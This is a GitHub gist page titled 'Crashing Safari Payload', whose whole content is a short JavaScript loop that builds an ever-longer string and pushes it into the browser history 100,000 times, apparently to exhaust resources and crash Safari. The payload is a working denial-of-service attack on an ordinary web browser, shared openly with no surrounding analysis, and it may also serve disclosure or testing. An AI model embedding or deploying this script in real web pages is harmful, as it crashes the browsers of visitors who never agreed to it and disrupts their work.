Skip to content

Instantly share code, notes, and snippets.

@ejcx
Created January 26, 2016 01:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ejcx/9b5342498b4b1bac964b to your computer and use it in GitHub Desktop.
Save ejcx/9b5342498b4b1bac964b to your computer and use it in GitHub Desktop.
Crashing Safari Payload
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment